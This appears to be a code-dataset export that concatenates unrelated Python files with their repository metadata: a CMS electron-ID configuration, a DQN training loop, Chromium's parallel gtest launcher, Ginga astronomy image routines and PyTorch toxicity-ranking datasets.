mensagem = forms.CharField(widget=forms.Textarea)
| 1.828125 | 2 |
RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | 852 | 11393 | import FWCore.ParameterSet.Config as cms
from RecoEgamma.ElectronIdentification.Identification.mvaElectronID_tools import *
# Documentation of the MVA
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/MultivariateElectronIdentificationRun2
# https://rembserj.web.cern.ch/rembserj/notes/Electron_MVA_ID_2017_documentation
#
# In this file we define the locations of the MVA weights, cuts on the MVA values
# for specific working points, and configure those cuts in VID
#
# The tag is an extra string attached to the names of the products
# such as ValueMaps that needs to distinguish cases when the same MVA estimator
# class is used with different tuning/weights
mvaTag = "Fall17NoIsoV1"
# There are 6 categories in this MVA. They have to be configured in this strict order
# (cuts and weight files order):
# 0 EB1 (eta<0.8) pt 5-10 GeV | pt < ptSplit && |eta| < ebSplit
# 1 EB2 (eta>=0.8) pt 5-10 GeV | pt < ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 2 EE pt 5-10 GeV | pt < ptSplit && |eta| >= ebeeSplit
# 3 EB1 (eta<0.8) pt 10-inf GeV | pt >= ptSplit && |eta| < ebSplit
# 4 EB2 (eta>=0.8) pt 10-inf GeV | pt >= ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 5 EE pt 10-inf GeV | pt >= ptSplit && |eta| >= ebeeSplit
mvaFall17WeightFiles_V1 = cms.vstring(
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_10_2017_puinfo_BDT.weights.xml.gz"
)
## The working point for this MVA that is expected to have about 90% signal
# WP tuned to give about 90 and 80% signal efficiecny for electrons from Drell-Yan with pT > 25 GeV
# The working point for the low pt categories is just taken over from the high pt
idName90 = "mvaEleID-Fall17-noIso-V1-wp90"
MVA_WP90 = EleMVA_WP(
idName = idName90, mvaTag = mvaTag,
cutCategory0 = "0.9165112826974601 - exp(-pt / 2.7381703555094217) * 1.03549199648109", # EB1 low pt
cutCategory1 = "0.8655738322220173 - exp(-pt / 2.4027944652597073) * 0.7975615613282494", # EB2 low pt
cutCategory2 = "-3016.035055227131 - exp(-pt / -52140.61856333602) * -3016.3029387236506", # EE low pt
cutCategory3 = "0.9616542816132922 - exp(-pt / 8.757943837889817) * 3.1390200321591206", # EB1
cutCategory4 = "0.9319258011430132 - exp(-pt / 8.846057432565809) * 3.5985063793347787", # EB2
cutCategory5 = "0.8899260780999244 - exp(-pt / 10.124234115859881) * 4.352791250718547", # EE
)
idName80 = "mvaEleID-Fall17-noIso-V1-wp80"
MVA_WP80 = EleMVA_WP(
idName = idName80, mvaTag = mvaTag,
cutCategory0 = "0.9530240956555949 - exp(-pt / 2.7591425841003647) * 0.4669644718545271", # EB1 low pt
cutCategory1 = "0.9336564763961019 - exp(-pt / 2.709276284272272) * 0.33512286599215946", # EB2 low pt
cutCategory2 = "0.9313133688365339 - exp(-pt / 1.5821934800715558) * 3.8889462619659265", # EE low pt
cutCategory3 = "0.9825268564943458 - exp(-pt / 8.702601455860762) * 1.1974861596609097", # EB1
cutCategory4 = "0.9727509457929913 - exp(-pt / 8.179525631018565) * 1.7111755094657688", # EB2
cutCategory5 = "0.9562619539540145 - exp(-pt / 8.109845366281608) * 3.013927699126942", # EE
)
### WP tuned for HZZ analysis with very high efficiency (about 98%)
# The working points were found by requiring the same signal efficiencies in
# each category as for the Spring 16 HZZ ID
# (see RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Spring16_HZZ_V1_cff.py)
idNamewpLoose = "mvaEleID-Fall17-noIso-V1-wpLoose"
MVA_WPLoose = EleMVA_WP(
idName = idNamewpLoose, mvaTag = mvaTag,
cutCategory0 = "-0.13285867293779202", # EB1 low pt
cutCategory1 = "-0.31765300958836074", # EB2 low pt
cutCategory2 = "-0.0799205914718861" , # EE low pt
cutCategory3 = "-0.856871961305474" , # EB1
cutCategory4 = "-0.8107642141584835" , # EB2
cutCategory5 = "-0.7179265933023059" # EE
)
#
# Finally, set up VID configuration for all cuts
#
# Create the PSet that will be fed to the MVA value map producer
mvaEleID_Fall17_noIso_V1_producer_config = cms.PSet(
mvaName = cms.string(mvaClassName),
mvaTag = cms.string(mvaTag),
# Category parameters
nCategories = cms.int32(6),
categoryCuts = cms.vstring(*EleMVA_6CategoriesCuts),
# Weight files and variable definitions
weightFileNames = mvaFall17WeightFiles_V1,
variableDefinition = cms.string("RecoEgamma/ElectronIdentification/data/ElectronMVAEstimatorRun2Fall17V1Variables.txt")
)
# Create the VPset's for VID cuts
mvaEleID_Fall17_V1_wpLoose = configureVIDMVAEleID( MVA_WPLoose )
mvaEleID_Fall17_V1_wp90 = configureVIDMVAEleID( MVA_WP90 )
mvaEleID_Fall17_V1_wp80 = configureVIDMVAEleID( MVA_WP80 )
mvaEleID_Fall17_V1_wpLoose.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp90.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp80.isPOGApproved = cms.untracked.bool(True)
| 1.75 | 2 |
dqn_plus/notebooks/code/train_ram.py | hadleyhzy34/reinforcement_learning | 0 | 11394 | <reponame>hadleyhzy34/reinforcement_learning<gh_stars>0
import numpy as np
import gym
from utils import *
from agent import *
from config import *
def train(env, agent, num_episode, eps_init, eps_decay, eps_min, max_t):
rewards_log = []
average_log = []
eps = eps_init
for i in range(1, 1 + num_episode):
episodic_reward = 0
done = False
state = env.reset()
t = 0
while not done and t < max_t:
t += 1
state = state.reshape(1, -1)
action = agent.act(state, eps)
next_state, reward, done, _ = env.step(action)
agent.memory.remember(state, action, reward, next_state, done)
if t % 4 == 0 and len(agent.memory) >= agent.bs:
agent.learn()
agent.soft_update(agent.tau)
state = next_state.copy()
episodic_reward += reward
rewards_log.append(episodic_reward)
average_log.append(np.mean(rewards_log[-100:]))
print('\rEpisode {}, Reward {:.3f}, Average Reward {:.3f}'.format(i, episodic_reward, average_log[-1]), end='')
if i % 100 == 0:
print()
eps = max(eps * eps_decay, eps_min)
return rewards_log, average_log
if __name__ == '__main__':
env = gym.make(RAM_ENV_NAME)
agent = Agent(env.observation_space.shape[0], env.action_space.n, BATCH_SIZE, LEARNING_RATE, TAU, GAMMA, DEVICE, False, DUEL, DOUBLE, PRIORITIZED)
rewards_log, _ = train(env, agent, RAM_NUM_EPISODE, EPS_INIT, EPS_DECAY, EPS_MIN, MAX_T)
np.save('{}_rewards.npy'.format(RAM_ENV_NAME), rewards_log)
agent.Q_local.to('cpu')
torch.save(agent.Q_local.state_dict(), '{}_weights.pth'.format(RAM_ENV_NAME)) | 2.5625 | 3 |
tools/parallel_launcher/parallel_launcher.py | Gitman1989/chromium | 2 | 11395 | #!/usr/bin/python
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool launches several shards of a gtest-based binary
in parallel on a local machine.
Example usage:
parallel_launcher.py path/to/base_unittests
"""
import optparse
import os
import subprocess
import sys
import threading
import time
def StreamCopyWindows(stream_from, stream_to):
"""Copies stream_from to stream_to."""
while True:
buf = stream_from.read(1024)
if not buf:
break
stream_to.write(buf)
stream_to.flush()
def StreamCopyPosix(stream_from, stream_to, child_exited):
"""
Copies stream_from to stream_to, and exits if child_exited
is signaled.
"""
import fcntl
# Put the source stream in a non-blocking mode, so we can check
# child_exited when there is no data.
fd = stream_from.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
while True:
try:
buf = os.read(fd, 1024)
except OSError, e:
if e.errno == 11:
if child_exited.isSet():
break
time.sleep(0.1)
continue
raise
if not buf:
break
stream_to.write(buf)
stream_to.flush()
class TestLauncher(object):
def __init__(self, args, executable, num_shards, shard):
self._args = args
self._executable = executable
self._num_shards = num_shards
self._shard = shard
self._test = None
def launch(self):
env = os.environ.copy()
env['CHROME_LOG_FILE'] = 'chrome_log_%d' % self._shard
if 'GTEST_TOTAL_SHARDS' in env:
# Handle the requested sharding transparently.
outer_shards = int(env['GTEST_TOTAL_SHARDS'])
outer_index = int(env['GTEST_SHARD_INDEX'])
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards * outer_shards)
# Calculate the right shard index to pass to the child. This is going
# to be a shard of a shard.
env['GTEST_SHARD_INDEX'] = str((self._num_shards * outer_index) +
self._shard)
else:
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards)
env['GTEST_SHARD_INDEX'] = str(self._shard)
args = self._args + ['--test-server-shard=' + str(self._shard)]
self._test = subprocess.Popen(args=args,
executable=self._executable,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env)
def wait(self):
if subprocess.mswindows:
stdout_thread = threading.Thread(
target=StreamCopyWindows,
args=[self._test.stdout, sys.stdout])
stdout_thread.start()
code = self._test.wait()
stdout_thread.join()
return code
else:
child_exited = threading.Event()
stdout_thread = threading.Thread(
target=StreamCopyPosix,
args=[self._test.stdout, sys.stdout, child_exited])
stdout_thread.start()
code = self._test.wait()
child_exited.set()
stdout_thread.join()
return code
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--shards", type="int", dest="shards", default=10)
# Make it possible to pass options to the launched process.
# Options for parallel_launcher should be first, then the binary path,
# and finally - optional arguments for the launched binary.
parser.disable_interspersed_args()
options, args = parser.parse_args(argv)
if not args:
print 'You must provide path to the test binary'
return 1
env = os.environ
if bool('GTEST_TOTAL_SHARDS' in env) != bool('GTEST_SHARD_INDEX' in env):
print 'Inconsistent environment. GTEST_TOTAL_SHARDS and GTEST_SHARD_INDEX'
print 'should either be both defined, or both undefined.'
return 1
launchers = []
for shard in range(options.shards):
launcher = TestLauncher(args, args[0], options.shards, shard)
launcher.launch()
launchers.append(launcher)
return_code = 0
for launcher in launchers:
if launcher.wait() != 0:
return_code = 1
return return_code
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| 2.46875 | 2 |
05_Practice1/Step06/yj.py | StudyForCoding/BEAKJOON | 0 | 11396 | a = int(input())
for i in range(a):
print('* '*(a-a//2))
print(' *'*(a//2)) | 3.53125 | 4 |
greydot/errors.py | TralahM/greydot-api | 0 | 11397 | <gh_stars>0
class NoMessageRecipients(Exception):
"""
Raised when Message Recipients are not specified.
"""
pass
class InvalidAmount(Exception):
"""
Raised when an invalid currency amount is specified
"""
pass
| 1.757813 | 2 |
ginga/util/dp.py | kyraikeda/ginga | 76 | 11398 | <gh_stars>10-100
#
# dp.py -- Data pipeline and reduction routines
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy as np
from collections import OrderedDict
from ginga import AstroImage, colors
from ginga.RGBImage import RGBImage
from ginga.util import wcs
# counter used to name anonymous images
prefixes = dict(dp=0)
def get_image_name(image, pfx='dp'):
global prefixes
name = image.get('name', None)
if name is None:
if pfx not in prefixes:
prefixes[pfx] = 0
name = '{0}{1:d}'.format(pfx, prefixes[pfx])
prefixes[pfx] += 1
image.set(name=name)
return name
def make_image(data_np, oldimage, header, pfx='dp'):
# Prepare a new image with the numpy array as data
image = AstroImage.AstroImage()
image.set_data(data_np)
# Set the header to be the old image header updated
# with items from the new header
oldhdr = oldimage.get_header()
oldhdr.update(header)
image.update_keywords(oldhdr)
# give the image a name
get_image_name(image, pfx=pfx)
return image
def create_blank_image(ra_deg, dec_deg, fov_deg, px_scale, rot_deg,
cdbase=[1, 1], dtype=None, logger=None, pfx='dp',
mmap_path=None, mmap_mode='w+'):
# ra and dec in traditional format
ra_txt = wcs.raDegToString(ra_deg, format='%02d:%02d:%06.3f')
dec_txt = wcs.decDegToString(dec_deg, format='%s%02d:%02d:%05.2f')
if np.isscalar(px_scale):
px_wd_scale, px_ht_scale = (px_scale, px_scale)
else:
px_wd_scale, px_ht_scale = px_scale
# Create an empty image
if np.isscalar(fov_deg):
fov_wd_deg, fov_ht_deg = (fov_deg, fov_deg)
else:
fov_wd_deg, fov_ht_deg = fov_deg
width = int(round(fov_wd_deg / px_wd_scale))
height = int(round(fov_ht_deg / px_ht_scale))
# round to an even size
if width % 2 != 0:
width += 1
if height % 2 != 0:
height += 1
if dtype is None:
dtype = np.float32
if mmap_path is None:
data = np.zeros((height, width), dtype=dtype)
else:
data = np.memmap(mmap_path, dtype=dtype, mode=mmap_mode,
shape=(height, width))
crpix1 = float(width // 2)
crpix2 = float(height // 2)
header = OrderedDict((('SIMPLE', True),
('BITPIX', -32),
('EXTEND', True),
('NAXIS', 2),
('NAXIS1', width),
('NAXIS2', height),
('RA', ra_txt),
('DEC', dec_txt),
('EQUINOX', 2000.0),
('OBJECT', 'MOSAIC'),
('LONPOLE', 180.0),
))
# Add basic WCS keywords
wcshdr = wcs.simple_wcs(crpix1, crpix2, ra_deg, dec_deg,
(px_wd_scale, px_ht_scale),
rot_deg, cdbase=cdbase)
header.update(wcshdr)
# Create image container
image = AstroImage.AstroImage(data, logger=logger)
image.update_keywords(header)
# give the image a name
get_image_name(image, pfx=pfx)
return image
def recycle_image(image, ra_deg, dec_deg, fov_deg, px_scale, rot_deg,
cdbase=[1, 1], logger=None, pfx='dp'):
# ra and dec in traditional format
ra_txt = wcs.raDegToString(ra_deg, format='%02d:%02d:%06.3f')
dec_txt = wcs.decDegToString(dec_deg, format='%s%02d:%02d:%05.2f')
header = image.get_header()
pointing = OrderedDict((('RA', ra_txt),
('DEC', dec_txt),
))
header.update(pointing)
# Update WCS keywords and internal wcs objects
wd, ht = image.get_size()
crpix1 = wd // 2
crpix2 = ht // 2
wcshdr = wcs.simple_wcs(crpix1, crpix2, ra_deg, dec_deg, px_scale,
rot_deg, cdbase=cdbase)
header.update(wcshdr)
# this should update the wcs
image.update_keywords(header)
# zero out data array
data = image.get_data()
data.fill(0)
## # Create new image container sharing same data
## new_image = AstroImage.AstroImage(data, logger=logger)
## new_image.update_keywords(header)
## # give the image a name
## get_image_name(new_image, pfx=pfx)
new_image = image
return new_image
def make_flat(imglist, bias=None):
flats = [image.get_data() for image in imglist]
flatarr = np.array(flats)
# Take the median of the individual frames
flat = np.median(flatarr, axis=0)
# Normalize flat
# mean or median?
#norm = np.mean(flat.flat)
norm = np.median(flat.flat)
flat = flat / norm
# no zero divisors
flat[flat == 0.0] = 1.0
img_flat = make_image(flat, imglist[0], {}, pfx='flat')
return img_flat
def make_bias(imglist):
biases = [image.get_data() for image in imglist]
biasarr = np.array(biases)
# Take the median of the individual frames
bias = np.median(biasarr, axis=0)
img_bias = make_image(bias, imglist[0], {}, pfx='bias')
return img_bias
def add(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np + data2_np
image = make_image(result, image1, {}, pfx='add')
return image
def subtract(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np - data2_np
image = make_image(result, image1, {}, pfx='sub')
return image
def divide(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np / data2_np
image = make_image(result, image1, {}, pfx='div')
return image
# https://gist.github.com/stscieisenhamer/25bf6287c2c724cb9cc7
def masktorgb(mask, color='lightgreen', alpha=1.0):
"""Convert boolean mask to RGB image object for canvas overlay.
Parameters
----------
mask : ndarray
Boolean mask to overlay. 2D image only.
color : str
Color name accepted by Ginga.
alpha : float
Opacity. Unmasked data are always transparent.
Returns
-------
rgbobj : RGBImage
RGB image for canvas Image object.
Raises
------
ValueError
Invalid mask dimension.
"""
mask = np.asarray(mask)
if mask.ndim != 2:
raise ValueError('ndim={0} is not supported'.format(mask.ndim))
ht, wd = mask.shape
r, g, b = colors.lookup_color(color)
rgbobj = RGBImage(data_np=np.zeros((ht, wd, 4), dtype=np.uint8))
rc = rgbobj.get_slice('R')
gc = rgbobj.get_slice('G')
bc = rgbobj.get_slice('B')
ac = rgbobj.get_slice('A')
ac[:] = 0 # Transparent background
rc[mask] = int(r * 255)
gc[mask] = int(g * 255)
bc[mask] = int(b * 255)
ac[mask] = int(alpha * 255)
# For debugging
#rgbobj.save_as_file('ztmp_rgbobj.png')
return rgbobj
def split_n(lst, sz):
n = len(lst)
k, m = n // sz, n % sz
return [lst[i * k + min(i, m):(i + 1) * k + min(i + 1, m)]
for i in range(sz)]
# END
| 2.546875 | 3 |
jigsaw/datasets/datasets.py | alexvishnevskiy/jigsaw | 0 | 11399 | <gh_stars>0
from torch.utils.data import Dataset
from ..utils.optimal_lenght import find_optimal_lenght
class PairedDataset(Dataset):
def __init__(
self,
df,
cfg,
tokenizer,
more_toxic_col='more_toxic',
less_toxic_col='less_toxic'
):
self.df = df
self.cfg = cfg
self.tokenizer = tokenizer
self.more_toxic = df[more_toxic_col].values
self.less_toxic = df[less_toxic_col].values
self.more_toxic_max_lenght = find_optimal_lenght(
df, tokenizer, more_toxic_col, cfg.max_length
)
self.less_toxic_max_lenght = find_optimal_lenght(
df, tokenizer, less_toxic_col, cfg.max_length
)
def __len__(self):
return len(self.df)
def __getitem__(self, index):
more_toxic = self.more_toxic[index]
less_toxic = self.less_toxic[index]
inputs_more_toxic = self.tokenizer.encode_plus(
more_toxic,
truncation=True,
max_length=self.more_toxic_max_lenght,
add_special_tokens=True,
)
inputs_less_toxic = self.tokenizer.encode_plus(
less_toxic,
truncation=True,
max_length=self.less_toxic_max_lenght,
add_special_tokens=True,
)
target = 1
more_toxic_ids = inputs_more_toxic['input_ids']
more_toxic_mask = inputs_more_toxic['attention_mask']
less_toxic_ids = inputs_less_toxic['input_ids']
less_toxic_mask = inputs_less_toxic['attention_mask']
return {
'more_toxic_ids': more_toxic_ids,
'more_toxic_mask': more_toxic_mask,
'less_toxic_ids': less_toxic_ids,
'less_toxic_mask': less_toxic_mask,
'target': target
}
class RegressionDataset(Dataset):
def __init__(self, df, cfg, tokenizer, text_col, target_col = None):
self.df = df
self.cfg = cfg
self.tokenizer = tokenizer
self.X = df[text_col].values
self.target_col = target_col
self.max_lenght = find_optimal_lenght(
df, tokenizer, text_col, cfg.max_length
)
if target_col is not None:
self.y = df[target_col].values
def __len__(self):
return len(self.df)
def __getitem__(self, index):
text = self.X[index]
if self.target_col is not None:
target = self.y[index]
inputs = self.tokenizer.encode_plus(
text,
truncation=True,
max_length=self.max_lenght,
add_special_tokens=True,
)
ids = inputs['input_ids']
mask = inputs['attention_mask']
if self.target_col is not None:
return {
'input_ids': ids,
'attention_mask': mask,
'target': target
}
else:
return {
'input_ids': ids,
'attention_mask': mask
} | 2.375 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.